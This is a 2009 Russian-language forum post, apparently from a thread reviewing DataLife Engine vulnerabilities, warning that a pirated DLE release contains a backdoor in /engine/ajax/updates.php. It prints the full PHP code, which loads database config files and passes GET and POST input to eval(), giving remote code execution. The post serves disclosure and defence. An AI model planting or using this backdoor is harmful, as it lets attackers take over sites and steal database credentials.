[ Обзор уязвимостей DataLife Engine ]

#11

05.11.2009, 10:31

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

С нами: 9725544

Репутация: 246

Был найден бэкдор в нулле от -=ZLOY=-
В этом файле был бэкдор. eval() через $_POST
Файл лежит в (/engine/ajax/updates.php)
Код бэкдора

PHP код:


		
			
if($_GET['wert']==''){

require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng';

$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset'];

@header("HTTP/1.0 200 OK");

@header("HTTP/1.1 200 OK");

@header("Cache-Control: no-cache, must-revalidate, max-age=0");

@header("Expires: 0");

@header("Pragma: no-cache");

@header("Content-type: text/css; charset=".$config['charset']);

$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']);

if (!strlen($data)) echo $lang['no_update']; else echo $data;

}else{

$file=(ROOT_DIR."/engine/classes/mysql.class.php");

if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";}

$file=(ROOT_DIR."/engine/data/dbconfig.php");

if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";}

$file=(ROOT_DIR."/engine/data/config.php");

if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";}

eval(base64_decode($_GET['user_id']));

echo <<<HTML

<HTML><body><form action="" method="post">

<center><textarea name="text" rows="10" cols="100"></textarea>

<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>

HTML;

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));

}}